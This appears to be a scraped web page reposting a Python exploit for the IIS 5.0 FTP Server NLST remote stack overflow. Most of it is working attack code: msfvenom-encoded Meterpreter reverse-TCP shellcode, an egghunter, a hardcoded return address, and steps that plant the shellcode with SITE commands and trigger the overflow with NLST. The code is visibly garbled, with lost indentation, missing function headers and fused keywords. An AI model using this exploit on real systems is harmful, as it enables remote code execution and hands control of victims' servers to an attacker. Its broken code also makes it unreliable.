Microsoft Ftp Service Exploit

  1. Microsoft Ftp Service Exploit

SAINT Exploits. Microsoft IIS FTP Server NLST Command Remote Overflow. More info here. Name: Internet Information Services (IIS) FTP Service Remote Code Execution Vulnera. File: nvt/secpod_ms11-004.nasl.


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Microsoft Ftp Service Exploit

1 contributor
# /usr/share/exploitdb/platforms/windows/remote/16740.rb
# Microsoft IIS FTP Server NLST Response Overflow
import socket
import sys
import time
import random
import string
import threading
from struct import pack
from ftplib importFTP
import SocketServer
#Shellcode 490 bytes including nops
# This is for the stored payload, the real BadChar list for file paths is:
#'BadChars' => 'x00x09x0cx20x0ax0dx0b',
# x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x22x2ax2ex2fx3ax3cx3ex3fx5cx7c
# Shellcode excluding nops 366
# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 > payload
# perl -e 'print 'x81xecxacx0dx00x00' > stackadj
# cat stackadj payload > shellcode
# cat shellcode msfvenom -b 'x00x09x0cx20x0ax0dx0b' -e x86/shikata_ga_nai -t python
shellcode =''
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode +='xdaxcbxb8x64x94xd5xb5xd9x74x24xf4x5fx33'
shellcode +='xc9xb1x55x31x47x1ax03x47x1ax83xc7x04xe2'
shellcode +='x91x15x39x19x54x16xc2x9ex8ex94xc2x5ex4e'
shellcode +='xf9x4bxbbx7fx39x2fxcfx2fx89x3bx9dxc3x62'
shellcode +='x69x36x50x06xa6x39xd1xadx90x74xe2x9exe1'
shellcode +='x17x60xddx35xf8x59x2ex48xf9x9ex53xa1xab'
shellcode +='x77x1fx14x5cxfcx55xa5xd7x4ex7bxadx04x06'
shellcode +='x7ax9cx9ax1dx25x3ex1cxf2x5dx77x06x17x5b'
shellcode +='xc1xbdxe3x17xd0x17x3axd7x7fx56xf3x2ax81'
shellcode +='x9ex33xd5xf4xd6x40x68x0fx2dx3bxb6x9axb6'
shellcode +='x9bx3dx3cx13x1ax91xdbxd0x10x5exafxbfx34'
shellcode +='x61x7cxb4x40xeax83x1bxc1xa8xa7xbfx8ax6b'
shellcode +='xc9xe6x76xddxf6xf9xd9x82x52x71xf7xd7xee'
shellcode +='xd8x9fx14xc3xe2x5fx33x54x90x6dx9cxcex3e'
shellcode +='xddx55xc9xb9x22x4cxadx56xddx6fxcex7fx19'
shellcode +='x3bx9ex17x88x44x75xe8x35x91xe0xedxa1x10'
shellcode +='xfexedxe1x4dx02xeex10xd2x8bx08x42xbaxdb'
shellcode +='x84x22x6ax9cx74xcax60x13xaaxeax8axf9xc3'
shellcode +='x80x64x54xbbx3cx1cxfdx37xddxe1x2bx32xdd'
shellcode +='x6axdexc2x93x9axabxd0xc3xfax53x29x13x97'
shellcode +='x53x43x17x31x03xfbx15x64x63xa4xe6x43xf7'
shellcode +='xa3x18x12xcexd8x2ex80x6exb7x4ex44x6fx47'
shellcode +='x18x0ex6fx2fxfcx6ax3cx4ax03xa7x50xc7x91'
shellcode +='x48x01xbbx32x21xafxe2x74xeex50xc1x07xe9'
shellcode +='xafx97x25x52xd8x67x69x62x18x02x69x32x70'
shellcode +='xd9x46xbdxb0x22x4dx96xd8xa9x03x54x78xad'
shellcode +='x0ex38x24xaexbcxe1x31x21x43x16x3exc3x78'
shellcode +='xc0x07xb1xb9xd0x33xcaxf0x75x15x41xfax2a'
shellcode +='x65x40x90x90x90x90x90x90x90'
print'Usage: python %s Target_IP [Port] ([FTP_username] [FTP_password])'% sys.argv[0]
print'Target_IP Required IP of target FTP server'
print'Port Optional (default: 21) Port target FTP server is hosted on'
print'FTP_username Optional (default: anonymous) User to be passed to target FTP server'
print'FTP_password Optional (default: anonymous) Password to be passed to target FTP server'
print'**NOTE: ftp_user AND ftp_pass must both be given or defaults will be applied**'
#lazy parsing.. sue me :P
global ip
global port
global ftp_user
global ftp_pass
#parse args
if (len(sys.argv) <2) or (len(sys.argv) >5):
if sys.argv 2:
ip = sys.argv[1]
port =int(sys.argv[2])
ftp_user ='anonymous'
ftp_pass ='anonymous'
elif sys.argv 5:
ip = sys.argv[1]
port =int(sys.argv[2])
ftp_user = sys.argv[3]
ftp_pass = sys.argv[4]
ip = sys.argv[1]
port =21
ftp_user ='anonymous'
ftp_pass ='anonymous'
#code stolen from Alexander Korznikov.
b = string
return'%s'% (''.join(['x%02X'%ord( x ) for x in b]))
defrandom_hex_string(size=4, chars=string.ascii_uppercase):
ascii_string =''.join(random.choice(chars) for _ inrange(size))
#hex_string = string2hex(ascii_string)
#return hex_string
return ascii_string
defdrop_shellcode(ftp_server, shellcode, egg):
encoded_shellcode = shellcode.replace('xff', 'xffxff')
i =0
while i <5:
#data = sock.send('SITE ' + egg + encoded_shellcode)
#data = sock.recv(1024)
#print data
ftp_server.sendcmd('SITE '+ egg + encoded_shellcode)
print'[+] Completed pass 1..'
i = i+1
hunt ='xB8x55x55x52x55x35x55x55x55x55x40x81x38'+egg +'x75xF7x40x40x40x40xFFxE0'
global pre
pre = random_hex_string(3)
pst =list(random_hex_string(210))
pst[0:4] =list(patch)
pst[90:94] =list(patch)
pst[94:98] =list(patch)
pst[140:172] = (list(patch))*8
pst[158:162] =list(ret)
pst[182:187] =list('xe9') +list(pack('<i', -410))
pst =''.join(pst)
pst = pst.replace('xff', 'xffxff')
directory_buffer = pre+pst
return directory_buffer
data =self.request.recv(1024)
cur_thread = threading.current_thread()
#response = '{}: {}'.format(, data)
classThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
defcreate_tcp_server(HOST='', PORT=0):
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon =True
return server
print'IIS 5.0 FTP Remote Stack Overflow Exploit by Disc0rdantMel0dy'
#create socket
ftp_server = FTP()
print'[+] Connecting to FTP Server: %s on port %d'% (ip, port)
print'[!] Could not connect to FTP Server: %s on port %d'% (ip, port)
print'[+] Connected! Waiting for welcome banner..'
print ftp_server.getwelcome()
#Attempt logon to FTP server
print'[+] Attemping FTP Logon with creds: %s / %s'%(ftp_user, ftp_pass)
ftp_server.login(user=ftp_user, passwd=ftp_pass)
print'[+] Successfully logged in with creds: %s / %s'%(ftp_user,ftp_pass)
'[!] Invalid FTP Credentials. If using default credentials please try again specifying valid credentials. Exiting..'
ret = pack('<i', 0x77e42ed8)
print'[+] Using return address of %s'% string2hex(ret)
patch = pack('<i', 0x7ffd7ffd)
#build egg for hunter to point to shellcode
egg = random_hex_string(4)
print'[+] Using %s as location for shellcode'% string2hex(egg)
#drop shellcode onto stack
print'[+] Dropping shellcode onto stack.'
drop_shellcode(ftp_server, shellcode, egg)
print'[+] Building attack buffer for directory name'
d_buffer = build_directory_buffer(egg, patch, ret)
#send overflow directory buffer
print'[+] Creating long directory..'
data = ftp_server.mkd(d_buffer)
print data
print'[!] Unexpected response from FTP Server.'
print'[!] Most likely cause is that the user does not have write permissions to FTP root directory.'
print'[!] You should retry the exploit with different credentials if they are available.'
print'[!] Exiting..'
#data = sock.recv(1024)
#print data
#if str(data).startswith('257'):
# print '[+] Directory Successfuly Created!'
# print '[!] Unexpected response from FTP Server.'
# print '[!] Most likely cause is that the user does not have write permissions to FTP root directory.'
# print '[!] You should retry the exploit with different credentials if they are available.'
# print '[!] Exiting..'
# sys.exit(-1)
#start TCP server for FTP server to connect to
print'[+] Starting local TCP server..'
srv = create_tcp_server(HOST='',PORT=0).
#get info for PORT address
srv_port1 = srv.server_address[1] /256
srv_port2 = srv.server_address[1] %256
#build address for PORT command
srv_address ='%s,%s,%s'% (str(srv.server_address[0]).replace('.',','), srv_port1, srv_port2)
#send PORT command
print'[+] Sending Port Command..'
data = ftp_server.sendcmd('PORT %s'% srv_address)
print data
#trigger vulnerability
print'[+] Sending NLIST command to trigger vulnerability..'
dir_name ='%s*/./%s*/'% (d_buffer, pre)
data = ftp_server.nlst(dir_name)
print data
  • Copy lines
  • Copy permalink